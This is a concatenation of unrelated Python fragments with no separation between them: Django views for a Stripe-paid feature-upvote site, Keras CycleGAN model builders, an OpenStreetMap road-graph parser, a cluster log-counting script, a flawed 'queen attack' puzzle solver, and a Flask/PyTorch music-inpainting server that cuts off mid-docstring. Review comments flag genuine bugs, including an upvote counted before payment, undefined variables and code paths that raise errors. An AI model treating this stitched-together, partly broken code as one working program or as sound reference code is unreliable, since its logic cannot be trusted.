    comments = Comment.objects.order_by('-created_date')
    return render(request, "features.html", {'features': features, 'comments': comments})
def upvote_feature(request, pk):
    """Show the Stripe-backed upvote page for one feature."""
    feature = get_object_or_404(Feature, pk=pk)
    key = settings.STRIPE_PUBLISHABLE_KEY  # publishable key for the client-side form
    return render(request, "upvotefeature.html", {'key': key, 'feature': feature})
def payment(request, pk):
    """Charge 500 pence via Stripe and credit one upvote to the feature.

    NOTE(review): the upvote is incremented and saved before the request
    method is checked and before the charge is attempted, so a plain GET or
    a failed charge still counts an upvote. There is also no error handling
    around the Stripe call. Confirm whether this is intended.
    """
    feature = get_object_or_404(Feature, pk=pk)
    feature.upvotes += 1
    feature.save()
    if request.method == 'POST':
        payment = stripe.Charge.create(
            amount=500,  # amount is in the currency's minor unit (pence)
            currency='gbp',
            description='Payment for a feature upvote',
            source=request.POST['stripeToken']
        )
    return render(request, 'payment.html', {'feature': feature})
def create_or_edit_feature(request, pk=None):
    """Render and process the add/edit feature form.

    With a pk the existing feature is edited; without one a new feature is
    created. A valid POST saves and redirects to the feature list; otherwise
    the (possibly bound, with errors) form is re-rendered.
    """
    feature = None
    if pk:
        feature = get_object_or_404(Feature, pk=pk)
    if request.method != "POST":
        form = AddFeatureForm(instance=feature)
        return render(request, 'addfeature.html', {'form': form})
    form = AddFeatureForm(request.POST, request.FILES, instance=feature)
    if form.is_valid():
        feature = form.save()
        return redirect(features)
    return render(request, 'addfeature.html', {'form': form})
def add_comment(request, pk):
    """Create a comment from POSTed form data, then return to the feature list.

    NOTE(review): the `form.contents` / `form.user` assignments below are
    attribute writes on the form object, not form data — presumably no-ops,
    since the form was already bound to request.POST. An invalid form is
    silently discarded (both paths redirect to 'features'). Confirm intent.
    """
    form = AddFeatureCommentForm(request.POST)
    if request.method == "POST":
        form = AddFeatureCommentForm(request.POST)
        form.contents = request.POST.get('contents')
        form.user = request.POST.get('user')
        if form.is_valid():
            form.save()
            return redirect(reverse('features'))
    return redirect(reverse('features'))
def mark_done_feature(request, pk):
    """Set a feature's status from the POSTed value and stamp its completion time."""
    feature = get_object_or_404(Feature, pk=pk)
    feature.status = request.POST.get("status")
    # Use Django's timezone-aware clock (timezone is already imported above)
    # instead of naive datetime.datetime.now(), which is rejected/warned about
    # on USE_TZ projects and skews comparisons against aware timestamps.
    feature.completed_date = timezone.now()
    feature.save()
    return redirect(reverse('features'))
def mark_doing_feature(request, pk):
    """Set a feature's status from the POSTed value (no completion timestamp)."""
    feature = get_object_or_404(Feature, pk=pk)
    feature.status = request.POST.get("status")
    feature.save()
    return redirect(reverse('features'))
from keras.initializers import RandomNormal
from keras.models import Model
from keras.models import Input
from keras.layers import Conv2D, Conv2DTranspose, UpSampling2D
from keras.layers import LeakyReLU
from keras.layers import Activation
from keras.layers import Concatenate
from keras_contrib.layers.normalization.instancenormalization import InstanceNormalization
from utils import ReflectionPadding2D
class Gan():
    """CycleGAN-style builders: a PatchGAN discriminator and a ResNet generator."""
    def __init__(self):
        # NOTE(review): `opt` is not defined or imported anywhere in this
        # file, so instantiating Gan() raises NameError — presumably an
        # argparse/options namespace was expected. Confirm against the
        # original project.
        img_shape = (opt.img_rows, opt.img_cols, opt.channels)
    # NOTE(review): the two builders below take no `self`; the source
    # indentation is ambiguous, and called as instance methods they would
    # receive `self` as img_shape. They look like static-style helpers.
    def build_discriminator(img_shape):
        'Define the Discriminator model'
        # initialization weight
        init = RandomNormal(stddev=0.02)
        # input_image
        in_image = Input(shape=img_shape)
        def disc_layer(in_image, out_channels, strides=(2,2), instance_norm=True, initializer=init):
            'Layer for building Discriminator'
            # Conv -> (InstanceNorm) -> LeakyReLU, the standard PatchGAN stack.
            d = Conv2D(out_channels, kernel_size=(4,4), strides=strides, padding='same', kernel_initializer=initializer)(in_image)
            if instance_norm:
                d = InstanceNormalization(axis=-1)(d)
            d = LeakyReLU(alpha=0.2)(d)
            return d
        # convolutions layers (first block skips normalization)
        d = disc_layer(in_image, 64, instance_norm=False)
        d = disc_layer(d, 128)
        d = disc_layer(d, 256)
        d = disc_layer(d, 512)
        d = disc_layer(d, 512, strides=(1,1))
        # output layer: 1-channel patch map of real/fake scores
        out = Conv2D(1, 4, padding='same', kernel_initializer=init)(d)
        # define model
        model = Model(in_image, out)
        return model
    def build_generator(img_shape, n_resnet=9):
        'Define the Generator model'
        # initialization weight
        init = RandomNormal(stddev=0.02)
        # input_image
        in_image = Input(shape=img_shape)
        def resnet_block(n_filters, input_layer, initializer=init):
            'Residual Connection block for building generator'
            # first layer
            rb = Conv2D(filters=n_filters, kernel_size=3, padding='same', kernel_initializer=initializer)(input_layer)
            rb = InstanceNormalization(axis=-1)(rb)
            rb = Activation('relu')(rb)
            # second layer
            rb = Conv2D(filters=n_filters, kernel_size=3, padding='same', kernel_initializer=initializer)(rb)
            rb = InstanceNormalization(axis=-1)(rb)
            # residual connection (concatenation rather than addition)
            rb = Concatenate()([rb, input_layer])
            return rb
        def main_block(input_layer, in_features=64, downsampling=True, initializer=init):
            'Downsampling or Upsampling block'
            if downsampling == True:
                # strided conv halves the spatial size, doubles the channels
                out_features = in_features*2
                g = Conv2D(out_features, kernel_size=3, strides=(2,2), padding='same', kernel_initializer=initializer)(input_layer)
            elif downsampling == False:
                # bilinear upsample + reflection-padded conv halves the channels
                out_features = in_features//2
                g = UpSampling2D(size=2, interpolation='bilinear')(input_layer)
                g = ReflectionPadding2D()(g)
                g = Conv2D(out_features, kernel_size=3, strides=1, padding='valid', kernel_initializer=initializer)(g)
            g = InstanceNormalization(axis=-1)(g)
            g = Activation('relu')(g)
            return g
        # c7s1-64
        g = Conv2D(64, (7,7), padding='same', kernel_initializer=init)(in_image)
        g = InstanceNormalization(axis=-1)(g)
        g = Activation('relu')(g)
        # d128
        g = main_block(input_layer=g, in_features=64, downsampling=True)
        # d256
        g = main_block(input_layer=g, in_features=128, downsampling=True)
        # R256
        for _ in range(n_resnet):
            g = resnet_block(256, g)
        # u128
        g = main_block(input_layer=g, in_features=256, downsampling=False)
        # u64
        g = main_block(input_layer=g, in_features=128, downsampling=False)
        # c7s1-3
        g = Conv2D(3, (7,7), padding='same', kernel_initializer=init)(g)
        g = InstanceNormalization(axis=-1)(g)
        out_image = Activation('tanh')(g)
        model = Model(in_image, out_image)
        return model
'''
https://gist.github.com/Tofull/49fbb9f3661e376d2fe08c2e9d64320e
'''
## Modules
# Elementary modules
from math import radians, cos, sin, asin, sqrt
import copy
# Graph module
import networkx
# Specific modules
import xml.sax # parse osm file
from pathlib import Path # manage cached tiles
def haversine(lon1, lat1, lon2, lat2, unit_m = True):
    """
    Great-circle distance between two points given in decimal degrees.
    Returns meters when unit_m is True (default), kilometers otherwise.
    """
    # work in radians throughout
    lon1_r, lat1_r, lon2_r, lat2_r = (radians(v) for v in (lon1, lat1, lon2, lat2))
    # haversine formula
    half_dlon = (lon2_r - lon1_r) / 2
    half_dlat = (lat2_r - lat1_r) / 2
    h = sin(half_dlat) ** 2 + cos(lat1_r) * cos(lat2_r) * sin(half_dlon) ** 2
    central_angle = 2 * asin(sqrt(h))
    radius = 6371  # mean Earth radius in km (use 3956 for miles)
    if unit_m:
        radius *= 1000
    return central_angle * radius
def download_osm(left, bottom, right, top, proxy = False, proxyHost = "10.0.4.2", proxyPort = "3128", cache = False, cacheTempDir = "/tmp/tmpOSM/", verbose = True):
    """ Return a filehandle to the downloaded data from osm api.

    (left, bottom, right, top): bounding box in decimal degrees. Optionally
    routes through an HTTP(S) proxy and/or caches the tile on disk under
    cacheTempDir so repeat calls are served locally.
    """
    import urllib.request # To request the web
    if (cache):
        ## cached tile filename
        cachedTileFilename = "osm_map_{:.8f}_{:.8f}_{:.8f}_{:.8f}.map".format(left, bottom, right, top)
        if (verbose):
            print("Cached tile filename :", cachedTileFilename)
        Path(cacheTempDir).mkdir(parents = True, exist_ok = True) ## Create cache path if not exists
        osmFile = Path(cacheTempDir + cachedTileFilename).resolve() ## Replace the relative cache folder path to absolute path
        if osmFile.is_file():
            # download from the cache folder
            if (verbose):
                print("Tile loaded from the cache folder.")
            fp = urllib.request.urlopen("file://"+str(osmFile))
            return fp
    if (proxy):
        # configure the urllib request with the proxy
        proxy_handler = urllib.request.ProxyHandler({'https': 'https://' + proxyHost + ":" + proxyPort, 'http': 'http://' + proxyHost + ":" + proxyPort})
        opener = urllib.request.build_opener(proxy_handler)
        urllib.request.install_opener(opener)
    request = "http://api.openstreetmap.org/api/0.6/map?bbox=%f,%f,%f,%f"%(left,bottom,right,top)
    if (verbose):
        print("Download the tile from osm web api ... in progress")
        print("Request :", request)
    fp = urllib.request.urlopen(request)
    if (verbose):
        print("OSM Tile downloaded")
    if (cache):
        if (verbose):
            print("Write osm tile in the cache"
            )
        content = fp.read()
        with open(osmFile, 'wb') as f:
            f.write(content)
        if osmFile.is_file():
            if (verbose):
                print("OSM tile written in the cache")
            fp = urllib.request.urlopen("file://"+str(osmFile)) ## Reload the osm tile from the cache (because fp.read moved the cursor)
            return fp
    # NOTE(review): if the cache write did not produce a file, this returns
    # `fp` after fp.read() already consumed it — the caller would get EOF.
    return fp
def read_osm(filename_or_stream, only_roads=True):
    """Read graph in OSM format from file specified by name or by stream object.

    Parameters
    ----------
    filename_or_stream : filename or stream object
    only_roads : bool
        When True (default) only ways tagged with 'highway' are kept.

    Returns
    -------
    G : networkx.DiGraph
        Nodes carry 'lat'/'lon'/'id'; edges carry an estimated 'length' in
        meters (haversine — no projection/reference system is applied).
    """
    osm = OSM(filename_or_stream)
    G = networkx.DiGraph()
    ## Add ways.
    # COMPATIBILITY FIX: Graph.add_path() was removed in networkx 2.0 and
    # Graph.node in 3.0; use networkx.add_path() and G.nodes instead.
    for w in osm.ways.values():
        if only_roads and 'highway' not in w.tags:
            continue
        # The forward direction is always present; the reverse direction is
        # added unless the way is explicitly tagged oneway=yes.
        networkx.add_path(G, w.nds, id=w.id, highway=w.tags['highway'])
        if w.tags.get('oneway') != 'yes':
            networkx.add_path(G, w.nds[::-1], id=w.id, highway=w.tags['highway'])
    ## Complete the used nodes' information.
    for n_id in G.nodes():
        n = osm.nodes[n_id]
        G.nodes[n_id]['lat'] = n.lat
        G.nodes[n_id]['lon'] = n.lon
        G.nodes[n_id]['id'] = n.id
    ## Estimate the length of each way.
    for u, v in G.edges():
        distance = haversine(G.nodes[u]['lon'], G.nodes[u]['lat'], G.nodes[v]['lon'], G.nodes[v]['lat'], unit_m=True)
        G.add_weighted_edges_from([(u, v, distance)], weight='length')
    return G
class Node:
    """A single OSM node: an identifier plus a lon/lat position."""

    def __init__(self, id, lon, lat):
        self.id = id
        self.lon = lon
        self.lat = lat
        self.tags = {}  # OSM key/value tags, filled in later by the parser

    def __str__(self):
        return "Node (id : %s) lon : %s, lat : %s " % (self.id, self.lon, self.lat)
class Way:
    """An OSM way: an ordered list of node ids plus key/value tags."""

    def __init__(self, id, osm):
        self.osm = osm
        self.id = id
        self.nds = []
        self.tags = {}

    def split(self, dividers):
        """Split this way at every interior node shared by more than one way.

        `dividers` maps node id -> number of ways using that node. Returns a
        list of shallow copies of this way whose ids gain a "-<i>" suffix.
        """
        def slice_array(ar, dividers):
            # Recursively cut at the first interior node used more than once;
            # the shared node is kept at the end of the left piece AND the
            # start of the right piece.
            for i in range(1, len(ar) - 1):
                if dividers[ar[i]] > 1:
                    left = ar[:i + 1]
                    right = ar[i:]
                    return [left] + slice_array(right, dividers)
            return [ar]

        pieces = []
        for index, chunk in enumerate(slice_array(self.nds, dividers)):
            part = copy.copy(self)
            part.id += "-%d" % index
            part.nds = chunk
            pieces.append(part)
        return pieces
class OSM:
    """Parsed OSM document: `nodes` (id -> Node) and `ways` (id -> Way),
    with degenerate ways removed and remaining ways split at shared nodes."""

    def __init__(self, filename_or_stream):
        """ File can be either a filename or stream/file object."""
        nodes = {}
        ways = {}
        superself = self

        class OSMHandler(xml.sax.ContentHandler):
            @classmethod
            def setDocumentLocator(self, loc):
                pass

            @classmethod
            def startDocument(self):
                pass

            @classmethod
            def endDocument(self):
                pass

            @classmethod
            def startElement(self, name, attrs):
                if name == 'node':
                    self.currElem = Node(attrs['id'], float(attrs['lon']), float(attrs['lat']))
                elif name == 'way':
                    self.currElem = Way(attrs['id'], superself)
                elif name == 'tag':
                    # <tag> belongs to the most recently opened node/way
                    self.currElem.tags[attrs['k']] = attrs['v']
                elif name == 'nd':
                    self.currElem.nds.append(attrs['ref'])

            @classmethod
            def endElement(self, name):
                if name == 'node':
                    nodes[self.currElem.id] = self.currElem
                elif name == 'way':
                    ways[self.currElem.id] = self.currElem

            @classmethod
            def characters(self, chars):
                pass

        xml.sax.parse(filename_or_stream, OSMHandler)
        self.nodes = nodes
        self.ways = ways
        # count times each node is used
        node_histogram = dict.fromkeys(self.nodes.keys(), 0)
        # BUG FIX: iterate over a snapshot of the values — deleting from
        # self.ways while iterating self.ways.values() raises
        # "RuntimeError: dictionary changed size during iteration" on Python 3.
        for way in list(self.ways.values()):
            if len(way.nds) < 2:  # if a way has only one node, delete it out of the osm collection
                del self.ways[way.id]
            else:
                for node in way.nds:
                    node_histogram[node] += 1
        # use that histogram to split all ways, replacing the member set of ways
        new_ways = {}
        for id, way in self.ways.items():
            split_ways = way.split(node_histogram)
            for split_way in split_ways:
                new_ways[split_way.id] = split_way
        self.ways = new_ways
def fetch_roads_OSM(osm_path, acceptedRoads=["motorway","motorway_link","trunk","trunk_link","primary","primary_link","secondary","secondary_link","tertiary","tertiary_link"]):
    """Extract road features from an OSM file via the OGR 'OSM' driver.

    Args:
        osm_path: path to a file readable by OGR's OSM driver.
        acceptedRoads: highway classes to keep; an empty list keeps every
            feature that has a highway tag. (The default list is never
            mutated, so the mutable default is safe here.)

    Returns:
        GeoDataFrame with columns osm_id/infra_type/geometry in EPSG:4326,
        or None (after printing a message) when nothing matched.
    """
    driver = ogr.GetDriverByName('OSM')
    data = driver.Open(osm_path)
    sql_lyr = data.ExecuteSQL("SELECT osm_id,highway FROM lines WHERE highway IS NOT NULL")
    roads = []
    for feature in sql_lyr:
        if feature.GetField('highway') is not None:
            osm_id = feature.GetField('osm_id')
            shapely_geo = loads(feature.geometry().ExportToWkt())
            if shapely_geo is None:
                continue
            highway = feature.GetField('highway')
            if acceptedRoads != []:
                if highway in acceptedRoads:
                    roads.append([osm_id, highway, shapely_geo])
            else:
                roads.append([osm_id, highway, shapely_geo])
    if len(roads) > 0:
        road_gdf = gpd.GeoDataFrame(roads, columns=['osm_id', 'infra_type', 'geometry'], crs={'init': 'epsg:4326'})
        return road_gdf
    else:
        # BUG FIX: 'country' was undefined in this scope (NameError on the
        # empty-result path); report the input path instead.
        print('No roads in {}'.format(osm_path))
def line_length(line, ellipsoid='WGS-84'):
    '''Length of a line in meters, given in geographic coordinates
    Adapted from https://gis.stackexchange.com/questions/4022/looking-for-a-pythonic-way-to-calculate-the-length-of-a-wkt-linestring#answer-115285
    Arguments:
        line {Shapely LineString} -- a shapely LineString object with WGS-84 coordinates
        ellipsoid {String} -- string name of an ellipsoid that `geopy` understands (see
            http://geopy.readthedocs.io/en/latest/#module-geopy.distance)
    Returns:
        Length of line in meters
    NOTE(review): the summation below reads `.kilometers` although the
    docstring promises meters — confirm the intended unit with callers.
    '''
    if line.geometryType() == 'MultiLineString':
        # BUG FIX: forward the caller's ellipsoid to each segment — the
        # recursion previously fell back silently to the WGS-84 default.
        return sum(line_length(segment, ellipsoid=ellipsoid) for segment in line)
    # Coordinates are (lon, lat); geopy expects (lat, lon), hence reversed().
    return sum(
        vincenty(tuple(reversed(a)), tuple(reversed(b)), ellipsoid=ellipsoid).kilometers
        for a, b in pairwise(line.coords)
    )
from datetime import datetime
import sys

# Usage: script <log-file>. Aggregates per-node line counts and the time span
# covered by the log, then reports totals per platform (KNL/SKX).
f = sys.argv[1]

# node -> platform mapping, one tab-separated pair per line
node_map = {}
with open('../all_knls.sinfo.nodes.map', "r") as fin:
    for line in fin:
        (node, platform) = line.rstrip().split('\t')
        node_map[node] = platform

# per-node aggregation: first/last timestamp seen and number of lines
nodes = {}
with open(f, "r") as fin:
    for line in fin:
        fields = line.rstrip().split(' ')
        slurm_file = fields[0]  # unused here, kept for field-layout clarity
        node = fields[5]
        # fields[1:4] is "Mon DD HH:MM:SS"; the year is not in the log
        d1 = ' '.join(fields[1:4])
        d1p = datetime.strptime("2020 " + d1, '%Y %b %d %H:%M:%S')
        if node not in nodes:
            nodes[node] = {}
            nodes[node]['count'] = 0
            nodes[node]['start'] = d1p
        # BUG FIX: 'end' was only assigned when a node was first seen, so the
        # elapsed time (end - start) was always zero. Track the latest
        # timestamp on every line instead (assumes lines are in chronological
        # order — TODO confirm against the log producer).
        nodes[node]['end'] = d1p
        nodes[node]['count'] += 1

# platform totals
platforms = {}
for platform in ['KNL', 'SKX']:
    platforms[platform] = {}
    platforms[platform]['count'] = 0
    platforms[platform]['hours'] = 0

for node in nodes.keys():
    vals = nodes[node]
    dd = vals['end'] - vals['start']
    count = vals['count']
    sec = dd.total_seconds()
    hours = sec / 3600
    days = sec / 86400
    platform = node_map[node]
    platforms[platform]['count'] += count
    platforms[platform]['hours'] += hours
    # per-node detail on stdout
    sys.stdout.write("%s\t%s\t%d\t%s\t%s\t%s\t%s\t%s\n" % (node, platform, count, hours, days, sec, vals['start'], vals['end']))

# per-platform summary on stderr
for platform in platforms.keys():
    vals = platforms[platform]
    sys.stderr.write("%s\t%d\t%d\n" % (platform, vals['count'], vals['hours']))
|
#Queens attack 1d
def queenAttack(board, qr, qc):
    """Count squares "reachable" on a 1-D board representation.

    board : list where board[r] holds the obstacle column for row r (0 = empty)
    qr, qc : queen's row and column

    NOTE(review): the logic below looks suspect — the diagonal test counts
    positions whose row/column deltas DIFFER (the opposite of a diagonal hit),
    `obs` is never used, and the board/qr mutation at the end alters the
    caller's state between calls. Verify against the intended puzzle spec.
    """
    n = len(board)
    obs = False  # never used — presumably a leftover obstacle flag
    count = 0
    #right
    for i in range(qr + 1, n):
        print('r: ', i)
        if board[i] == 0:  # row i has no obstacle recorded
            count += 1
            #board[i] = 'q'
    #left
    for i in range(1, qr):
        if board[i] == 0:
            print('l: ', i)
            count += 1
            #board[i] = 'q'
    #check diagonals
    for i in range(1, n):
        # counts rows where |row delta| != |column delta| — TODO confirm intent
        if abs(qr - i) != abs(board[qr] - board[i]):
            count += 1
            print(qr, i, board[qr], board[i])
    # Mutates the shared board and the local qr before returning — the
    # caller's own board is modified as a side effect.
    if qr + 1 < n:
        qr += 1
        board[qr] = qc
    #print(count)
    return count
# Read board size and obstacle count, then the queen's position.
n, k = map(int, input().strip().split(' '))
board = [0] * (n + 1)
qr, qc = map(int, input().strip().split(' '))
board[qr] = qc
count = 0
# Record each obstacle, re-evaluating the attack count after every one.
for _ in range(k):
    r, c = map(int, input().split(' '))
    board[r] = c
    count = queenAttack(board, qr, qc)
print(count)
|
import json
from flask import Flask
from flask import request
from flask.helpers import make_response
from flask.json import JSONDecoder, jsonify
from torch.utils import data
from BFT.utils import cuda_variable
from flask_cors import CORS
from BFT.handlers import DecoderPrefixHandler
app = Flask(__name__)
CORS(app)
"""
@author: Gaetan Hadjeres
"""
from BFT.positional_embeddings import PositionalEmbedding
import importlib
import os
import shutil
from datetime import datetime
import click
import torch
import torch.multiprocessing as mp
import torch.distributed as dist
from torch.nn.parallel import DistributedDataParallel
from BFT.getters import get_data_processor, get_dataloader_generator, get_decoder, get_sos_embedding, get_positional_embedding
DEBUG = False
@click.command()
@click.argument('cmd')
@click.option('-o', '--overfitted', is_flag=True)
@click.option('-c', '--config', type=click.Path(exists=True))
@click.option('-n', '--num_workers', type=int, default=0)
def launcher(cmd, overfitted, config, num_workers):
    """CLI entry point: load the config module and spawn the serving process."""
    print(cmd)
    # Only serving is supported here, and inference uses a single GPU.
    assert cmd == 'serve'
    world_size = 1
    # Turn the config file path into an importable module path and pull the
    # `config` dict out of it.
    config_path = config
    config_module_name = os.path.splitext(config)[0].replace('/', '.')
    config = importlib.import_module(config_module_name).config
    # Reuse the stored timestamp when present, otherwise stamp the run now.
    timestamp = config['timestamp']
    if timestamp is None:
        timestamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
    config['timestamp'] = timestamp
    # The model directory is wherever the config file lives.
    model_dir = os.path.dirname(config_path)
    print(f'Using {world_size} GPUs')
    mp.spawn(main,
             args=(overfitted, config, num_workers, world_size, model_dir),
             nprocs=world_size,
             join=True)
def main(rank, overfitted, config, num_workers, world_size, model_dir):
    """Worker entry point spawned by `launcher`.

    Initialises the NCCL process group, builds the decoder stack from the
    config dict, publishes `data_processor` and `handler` as module globals
    (read by the Flask routes below), loads the checkpoint, and starts the
    blocking Flask server.
    """
    # === Init process group
    os.environ['MASTER_ADDR'] = 'localhost'
    # os.environ['MASTER_PORT'] = '12355'
    # os.environ['MASTER_PORT'] = '12356'
    os.environ['MASTER_PORT'] = '12357'
    dist.init_process_group(backend='nccl', world_size=world_size, rank=rank)
    torch.cuda.set_device(rank)
    device = f'cuda:{rank}'
    # === Decoder ====
    # dataloader generator
    dataloader_generator = get_dataloader_generator(
        dataset=config['dataset'],
        dataloader_generator_kwargs=config['dataloader_generator_kwargs'])
    # data processor — published globally for the request handlers
    global data_processor
    data_processor = get_data_processor(
        dataloader_generator=dataloader_generator,
        data_processor_type=config['data_processor_type'],
        data_processor_kwargs=config['data_processor_kwargs'])
    # positional embedding
    positional_embedding_target: PositionalEmbedding = get_positional_embedding(
        dataloader_generator=dataloader_generator,
        positional_embedding_dict=config['positional_embedding_dict'])
    # sos embedding
    sos_embedding = get_sos_embedding(
        dataloader_generator=dataloader_generator,
        sos_embedding_dict=config['sos_embedding_dict'])
    encoder_decoder = get_decoder(
        data_processor=data_processor,
        dataloader_generator=dataloader_generator,
        positional_embedding=positional_embedding_target,
        sos_embedding=sos_embedding,
        decoder_type=config['decoder_type'],
        decoder_kwargs=config['decoder_kwargs'],
        training_phase=False)
    encoder_decoder.to(device)
    # DDP wrapper (world_size is 1 here, but keeps checkpoint compatibility)
    encoder_decoder = DistributedDataParallel(
        module=encoder_decoder,
        device_ids=[rank],
        output_device=rank,
        # find_unused_parameters=True
    )
    # handler — published globally for the request handlers
    global handler
    handler = DecoderPrefixHandler(model=encoder_decoder,
                                   model_dir=model_dir,
                                   dataloader_generator=dataloader_generator)
    # Load model: --overfitted picks the last checkpoint instead of the
    # early-stopped one.
    if overfitted:
        handler.load(early_stopped=False, recurrent=True)
    else:
        handler.load(early_stopped=True, recurrent=True)
    local_only = False
    if local_only:
        # accessible only locally:
        app.run(threaded=True)
    else:
        # accessible from outside:
        port = 5000 if DEBUG else 8080
        app.run(host='0.0.0.0',
                port=port,
                threaded=True,
                debug=DEBUG,
                use_reloader=False)
@app.route('/ping', methods=['GET'])
def ping():
    """Health-check endpoint."""
    response = 'pong'
    return response
@app.route('/invocations', methods=['POST'])
def invocations():
    """Inpainting endpoint.

    Parses an Ableton-style note request (case 'start' or 'continue'),
    runs the globally-loaded model handler, and returns the regenerated
    notes as JSON.
    """
    # === Parse request ===
    # common components
    d = json.loads(request.data)
    case = d['case']
    assert case in ['start', 'continue']
    if DEBUG:
        print(d)
    notes = d['notes']
    selected_region = d['selected_region']
    clip_start = d['clip_start']
    tempo = d['tempo']
    beats_per_second = tempo / 60
    seconds_per_beat = 1 / beats_per_second
    # two different parsing methods
    if case == 'start':
        num_max_generated_events = 15
        (x, metadata_dict, unused_before, before, after, unsused_after,
         clip_start,
         selected_region) = ableton_to_tensor(notes, clip_start,
                                              seconds_per_beat,
                                              selected_region)
    elif case == 'continue':
        num_max_generated_events = 30
        json_notes = d['notes']
        event_start = d['next_event_start']
        event_end = d['next_event_end']
        # NOTE(review): this branch only binds x/num_events_before_padding;
        # metadata_dict, unused_before, before, after and unsused_after are
        # used below but never assigned on this path, so a 'continue' request
        # would raise NameError — confirm whether this branch is reachable.
        x, num_events_before_padding = json_to_tensor(json_notes,
                                                      seconds_per_beat,
                                                      event_start, event_end,
                                                      selected_region)
    else:
        raise NotImplementedError
    global handler
    # NOTE(review): num_max_generated_events computed above is not forwarded.
    x_inpainted, generated_region, done = handler.inpaint(
        x=x,
        metadata_dict=metadata_dict,
        num_max_generated_events=None,  # TODO change
        temperature=1.,
        top_p=0.98,
        top_k=0)
    # Reassemble the full sequence: untouched prefix + context + generation +
    # context + untouched suffix.
    new_x = torch.cat([
        unused_before[0], before[0], generated_region[0], after[0],
        unsused_after[0]
    ],
                      dim=0).detach().cpu()
    # TODO use done to rescale
    ableton_notes, track_duration = tensor_to_ableton(
        new_x,
        start_time=clip_start,
        beats_per_second=beats_per_second,
        rescale=False)
    ableton_notes_region, _ = tensor_to_ableton(
        generated_region[0].detach().cpu(),
        start_time=selected_region['start'],
        expected_duration=(selected_region['end'] - selected_region['start']) *
        seconds_per_beat,
        beats_per_second=beats_per_second,
        rescale=done)
    after_region = torch.cat([after[0], unsused_after[0]],
                             dim=0).detach().cpu()
    ableton_notes_after_region, _ = tensor_to_ableton(
        after_region,
        start_time=selected_region['end'],  # TODO WRONG!,
        beats_per_second=beats_per_second)
    print(f'albeton notes: {ableton_notes}')
    print(f'region start: {ableton_notes_region}')
    d = {
        'id': d['id'],
        'notes': ableton_notes,
        'track_duration': track_duration,
        'done': done,
        'selected_region': selected_region,
        'notes_region': ableton_notes_region,
        'notes_after_region': ableton_notes_after_region,
        'clip_start': clip_start,
        'clip_id': d['clip_id'],
        'clip_end': d['clip_end'],
        'detail_clip_id': d['detail_clip_id'],
        'tempo': d['tempo']
    }
    return jsonify(d)
def preprocess_input(x, event_start, event_end):
    """
    Args:
        x ([type]): original sequence (num_events, num_channels )
        event_start ([type]): indicates the beginning of the recomposed region
        event_end ([type]): indicates the end of the recomposed region
    Returns:
        ((x_beginning, x, x_end), masked_positions, slice_begin) where x is the
        (possibly sliced) window fed to the model, x_beginning/x_end are the
        cut-off parts, masked_positions marks the recomposed span, and
        slice_begin is the offset of the window in the full sequence.
    """
    global data_processor
    global handler
    # add batch_dim
    # only one proposal for now
    num_examples = 1
    x = x.unsqueeze(0).repeat(num_examples, 1, 1)
    _, x, _ = data_processor.preprocess(x)
    total_length = x.size(1)
    # if x is too large
    # x is always >= 1024 since we pad
    num_events_model = handler.dataloader_generator.sequences_size
    if total_length > num_events_model:
        # slice a model-sized window centred (when possible) on event_start
        slice_begin = max((event_start - num_events_model // 2), 0)
        slice_end = slice_begin + num_events_model
        x_beginning = x[:, :slice_begin]
        x_end = x[:, slice_end:]
        x = x[:, slice_begin:slice_end]
    else:
        x_beginning = torch.zeros(1, 0).to(x.device)
        x_end = torch.zeros(1, 0).to(x.device)
        # BUG FIX: slice_begin was never assigned on this branch, so both
        # `offset = slice_begin` and the return raised NameError whenever the
        # sequence already fit the model. No slicing means a zero offset.
        slice_begin = 0
    offset = slice_begin
    masked_positions = torch.zeros_like(x).long()
    masked_positions[:, event_start - offset:event_end - offset] = 1
    # the last time shift should be known:
    # TODO check this condition : should be done in conjunction with setting the correct duration of the inpainted region
    # if event_end < total_length:
    #     masked_positions[:, event_end - offset - 1, 3] = 0
    return (x_beginning, x, x_end), masked_positions, slice_begin
def json_to_tensor(json_note_list, seconds_per_beat, event_start, event_end,
                   selected_region):
    """Convert a JSON note list to a padded, tokenized tensor.

    Returns (x, num_events_before_padding) where x stacks the dataloader's
    feature channels along the last dimension.
    """
    # TODO!
    d = {
        'pitch': [],
        'time': [],
        'duration': [],
        'velocity': [],
        'muted': [],
    }
    # pitch time duration velocity muted
    for n in json_note_list:
        for k, v in n.items():
            d[k].append(v)
    # we now have to sort (by onset time, then descending pitch)
    l = [[p, t, d, v] for p, t, d, v in zip(d['pitch'], d['time'],
                                            d['duration'], d['velocity'])]
    l = sorted(l, key=lambda x: (x[1], -x[0]))
    # durations are clamped to a 0.05 minimum
    d = dict(pitch=torch.LongTensor([x[0] for x in l]),
             time=torch.FloatTensor([x[1] for x in l]),
             duration=torch.FloatTensor([max(float(x[2]), 0.05) for x in l]),
             velocity=torch.LongTensor([x[3] for x in l]))
    # multiply by tempo (beats -> seconds)
    d['time'] = d['time'] * seconds_per_beat
    d['duration'] = d['duration'] * seconds_per_beat
    # compute time_shift (delta to the next onset; last one is 0)
    d['time_shift'] = torch.cat(
        [d['time'][1:] - d['time'][:-1],
         torch.zeros(1, )], dim=0)
    # Recompute time shifts in the selected_region
    # Set correct time shifts and compute masked_positions
    # TODO THIS CAN BE NEGATIVE!
    start_time = d['time'][event_start]
    end_time = selected_region['end'] * seconds_per_beat
    num_events_to_compose = event_end - event_start
    # spread the region's duration uniformly over the events to recompose
    d['time_shift'][event_start:event_end] = ((end_time - start_time.item()) /
                                              num_events_to_compose)
    global handler
    num_events_before_padding = d['pitch'].size(0)
    # to numpy :(
    d = {k: t.numpy() for k, t in d.items()}
    # delete unnecessary entries in dict
    del d['time']
    # TODO over pad?
    d = handler.dataloader_generator.dataset.add_start_end_symbols(
        sequence=d, start_time=0, sequence_size=1024 + 512)
    sequence_dict = handler.dataloader_generator.dataset.tokenize(d)
    # to pytorch :)
    sequence_dict = {k: torch.LongTensor(t) for k, t in sequence_dict.items()}
    x = torch.stack(
        [sequence_dict[e] for e in handler.dataloader_generator.features],
        dim=-1).long()
    return x, num_events_before_padding
def ableton_to_tensor(ableton_note_list,
                      clip_start,
                      seconds_per_beat,
                      selected_region=None):
    """[summary]
    Args:
        ableton_note_list ([type]): flat list in the Ableton wire format
            ('notes', count, 'note', pitch, time, duration, velocity, muted,
            ..., 'done')
        clip_start ([type]): [description]
        selected_region ([type], optional): dict with 'start'/'end' in beats.
            Defaults to None.
    Returns:
        x [type]: x is at least of size (1024, 4), it is padded if necessary

    NOTE(review): event_start/event_end stay None when selected_region is
